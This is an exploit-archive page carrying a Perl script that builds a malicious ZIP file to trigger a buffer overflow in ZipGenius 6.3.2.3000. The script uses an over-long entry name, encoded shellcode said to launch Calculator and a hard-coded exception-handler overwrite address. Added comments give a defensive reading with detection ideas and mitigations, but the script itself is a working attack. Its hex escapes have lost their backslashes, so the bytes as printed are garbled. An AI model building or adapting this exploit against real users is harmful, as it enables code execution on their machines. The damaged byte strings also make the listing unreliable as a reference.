Home / exploits ZipGenius 6.3.2.3000 Buffer Overflow
Posted on 09 July 2011
#!/usr/bin/perl
#
#[+]Exploit Title: ZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit
#[+]Date: 08 72011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freewarefiles.com/ZipGenius-V_program_3344.html
#[+]Version: 6.3.2.3000
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
# Review notes (defensive reading of this listing)
#
# Purpose: assembles one buffer (local file header + name, central directory
# header + name, end-of-central-directory record) and writes it to
# "Exploit.zip". The single archive entry carries a file name of 4064
# characters plus ".txt". Per the title, the target is a buffer overflow in
# ZipGenius 6.3.2.3000 triggered by a .ZIP file.
#
# Fidelity: the string literals below are kept exactly as printed on the page.
# They read like hex escapes whose escape character was lost in extraction, so
# this listing should not be treated as byte-accurate when deriving
# signatures or indicators.
#
# Detection: the two-byte value "e4 0f" in both headers is 0x0fe4 = 4068 when
# read little-endian, which equals 4064 + length(".txt"). A ZIP entry whose
# file-name length field is in the thousands is far beyond any legitimate
# Windows path length and is a reasonable condition for a mail/web gateway or
# file-scanning rule to flag, independent of the payload bytes.
#
# Scope: the header above records CVE "N/A" and a single test platform
# (WIN-XP SP3 Brazilian Portuguese); the page names no fixed version.
use strict;
use warnings;

# Output file name; created in the current working directory.
my $filename = "Exploit.zip";

# Banner output, then a two-second pause before building the file.
print " ZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit ";
print " Created by C4SS!0 G0M3S ";
print " E-mail Louredo_@hotmail.com ";
print " Site www.exploit-br.org/ ";
sleep(2);

# Appears to be a ZIP local file header ("50 4B 03 04" is the PK\x03\x04
# signature). The "e4 0f" pair is presumably the file-name length field
# (4068, see the detection note above) - exact field offsets not verified
# against this extracted text.
my $head = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

# Appears to be the matching central directory file header ("50 4B 01 02"),
# carrying the same "e4 0f" length value for the entry name.
my $head2 = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

# Appears to be the end-of-central-directory record ("50 4B 05 06") declaring
# one entry. "12 10 00 00" = 0x1012 = 4114 and "02 10 00 00" = 0x1002 = 4098,
# consistent with a 46-byte central header + 4068-byte name and a 30-byte
# local header + 4068-byte name respectively.
my $head3 = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

# Proof-of-execution payload. The author's inline comment describes it as
# WinExec("CALC",0), i.e. it launches Calculator. The text is printable ASCII
# only - presumably an alphanumeric-encoded form; not decoded or verified here.
my $shellcode =
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L".
"41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912".
"6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0);
"KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL".
"VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK".
"HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB".
"K4BX0S5LKNQX14OM8646B9CZOA";

# The entry's file name is built here: payload first, then "A" filler up to
# 1060 characters.
my $payload = $shellcode;
$payload .= "A" x (1060-length($shellcode));
# A short marker followed by a hard-coded 32-bit value packed little-endian
# ('V'). NOTE(review): this pair at a fixed offset looks like an overwritten
# exception-handler record - the page does not say so; confirm before relying
# on it. A fixed address of this kind depends on a predictable memory layout,
# which is why ASLR, DEP and SafeSEH/SEHOP are the relevant platform
# mitigations for this class of bug.
$payload .= "xebx0bx90x90";
$payload .= pack('V',0x0283119C);
$payload .= "x45" x 10;
$payload .= ("x61" x 13)."x58x50xc3"; #POP EAX / PUSH EAX / RETN
# Fill the name out to 4064 characters and give it a benign-looking extension;
# the result is 4068 characters, matching the "e4 0f" length value above.
$payload .= "x41" x (4064-length($payload));
$payload = $payload.".txt";

# The same over-long name is placed after both the local header and the
# central directory header, followed by the end-of-central-directory record.
my $zip = $head.$payload.$head2.$payload.$head3;

# Write the buffer to disk; ">" truncates any existing Exploit.zip. On open
# failure the script dies with the OS error text.
open(FILE,">$filename") || die "[-]Error: $! ";
print FILE $zip;
close(FILE);
print "[+] ZIP File Created With Sucess:) ";
sleep(1);
